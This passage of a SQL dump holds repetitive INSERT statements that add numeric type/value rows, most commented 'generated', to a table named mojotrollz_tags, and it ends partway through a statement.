INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4701, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4701, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4702, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4702, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4705, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4705, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4706, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4706, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4707, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4707, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4708, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4708, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4709, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4709, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4710, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4711, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4711, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4712, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4712, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4713, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4713, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4714, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4714, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4715, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4715, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4716, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4716, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4718, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4718, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4719, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4719, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4720, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4720, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4721, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4721, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4722, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4722, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4723, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4723, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4726, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4726, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4727, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4727, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4728, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4728, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4729, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4729, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4730, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4730, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4731, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4731, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4732, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4732, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4752, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4752, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4752, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4752, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4752, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4752, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4753, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4753, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4772, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4772, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4773, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4773, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4775, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4775, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4775, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4775, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4775, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4777, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4778, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4779, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4779, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4780, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4781, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4782, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4782, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4783, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4783, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4784, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4784, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4785, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4786, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4786, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4787, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4787, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4787, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4788, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4788, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4789, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4789, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4791, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4791, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4792, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4792, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4794, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4794, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4795, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4798, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4798, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4798, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4799, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4799, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4799, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4802, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4802, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4803, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4803, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4805, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4805, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4805, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4807, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4807, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4807, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4809, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4809, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4809, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4810, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4810, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4810, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4811, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4811, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4811, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4812, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4812, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4812, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4813, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4813, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4813, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4814, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4814, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4814, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4815, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4815, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4815, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4818, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4818, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4818, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4819, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4819, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4819, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4820, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4820, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4820, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4821, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4821, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4821, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4822, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4822, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4822, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4823, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4823, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4823, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4824, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4824, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4824, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4825, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4825, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4825, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4827, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4827, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4827, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4829, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4829, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4829, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4830, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4830, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4830, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4831, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4831, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4831, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4832, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4832, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4832, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4834, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4834, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4841, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4841, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4842, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4842, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4842, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4844, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4844, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4845, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4845, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4846, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4846, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4847, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4847, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4847, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4848, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4848, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4848, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4849, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4849, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4849, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4850, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4850, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4850, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4851, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4851, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4852, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4852, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4852, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4853, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4853, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4853, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4854, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4854, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4854, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4855, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4855, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4855, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4856, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4856, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4857, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4857, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4857, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4860, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4860, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4860, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4861, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4861, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4861, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4863, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4863, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4863, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4872, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4872, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4875, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4875, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4876, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4876, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4877, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4877, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4878, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4878, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4879, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` 